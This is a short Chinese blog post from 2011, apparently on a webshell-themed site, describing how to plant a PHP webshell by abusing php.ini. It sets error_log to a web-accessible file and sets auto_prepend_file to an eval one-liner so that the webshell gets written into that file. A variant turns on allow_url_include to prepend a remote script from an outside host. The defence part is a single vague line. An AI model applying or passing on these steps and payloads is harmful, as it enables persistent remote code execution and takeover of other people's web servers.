利用php.ini拿shell及防范

分类:安全 | 2011-10-5 | 撸过 57 次
1人扯谈

1.把error_log设置到web目录

~例如hackxl.php

2.auto_prepend_file设为一句话

~比如设为<?php eval($_REQUEST[#]);?>

3.然后访问任意php php文件后会因为找不到auto_prepend_file的文件而报错,而会产生报错;把<?php eval($_REQUEST[#]);?>写入了hackxl.php

auto_prepend_file指令的作用是包含文件可以像使用include()语句包含的文件一样;也就是,如果该文件不存在,将产生一个警告也就就报错。

不过php会对error输出作htmlentities()处理。

可以用

allow_url_include = on
auto_prepend_file = ‘https://www.webshell.cc/s.txt’

安全方面平时注意检查就行了

本站内容均为原创,转载请务必保留署名与链接!
利用php.ini拿shell及防范:https://www.webshell.cc/1715.html
标签:

相关日志